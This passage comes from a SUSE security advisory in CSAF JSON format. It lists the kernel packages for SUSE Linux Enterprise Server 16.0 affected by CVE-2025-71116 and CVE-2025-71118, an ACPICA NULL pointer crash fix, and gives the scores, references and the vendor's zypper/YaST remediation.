"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71116"
},
{
"cve": "CVE-2025-71118",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71118"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nACPICA: Avoid walking the Namespace if start_node is NULL\n\nAlthough commit 0c9992315e73 (\"ACPICA: Avoid walking the ACPI Namespace\nif it is not there\") fixed the situation when both start_node and\nacpi_gbl_root_node are NULL, the Linux kernel mainline now still crashed\non Honor Magicbook 14 Pro [1].\n\nThat happens due to the access to the member of parent_node in\nacpi_ns_get_next_node(). The NULL pointer dereference will always\nhappen, no matter whether or not the start_node is equal to\nACPI_ROOT_OBJECT, so move the check of start_node being NULL\nout of the if block.\n\nUnfortunately, all the attempts to contact Honor have failed, they\nrefused to provide any technical support for Linux.\n\nThe bad DSDT table\u0027s dump could be found on GitHub [2].\n\nDMI: HONOR FMB-P/FMB-P-PCB, BIOS 1.13 05/08/2025\n\n[ rjw: Subject adjustment, changelog edits ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71118",
"url": "https://www.suse.com/security/cve/CVE-2025-71118"
},
{
"category": "external",
"summary": "SUSE Bug 1256763 for CVE-2025-71118",
"url": "https://bugzilla.suse.com/1256763"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
